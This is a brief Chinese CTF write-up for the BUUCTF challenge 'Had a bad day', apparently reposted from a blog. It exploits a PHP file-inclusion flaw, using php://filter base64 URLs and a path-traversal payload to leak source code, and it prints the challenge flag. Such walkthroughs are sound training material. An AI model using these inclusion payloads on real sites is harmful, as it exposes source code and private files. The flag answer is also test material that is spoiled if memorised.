本文主要是介绍BUUCTF_[BSidesCF 2020]Had a bad day,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
[BSidesCF 2020]Had a bad day
1.一看题目直接尝试文件包含
2.直接报错,确实是存在文件包含漏洞
http://307b4461-36d6-443f-879a-68803a57f721.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index
strpos() 函数查找字符串在另一字符串中第一次出现的位置(区分大小写)。
注释:strpos() 函数是区分大小写的。
注释:该函数是二进制安全的。
3.说明输入的参数必须含有woofers,meowers,index
http://307b4461-36d6-443f-879a-68803a57f721.node5.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resource=index…/…/flag
4.成功得到flag
flag{558a1dc9-78a9-41bc-9833-e3168ad731b2}
这篇关于BUUCTF_[BSidesCF 2020]Had a bad day的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
![BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin](https://i-blog.csdnimg.cn/direct/ed45c0efd0ac40c68b2c1bc7b6d90ebc.png)
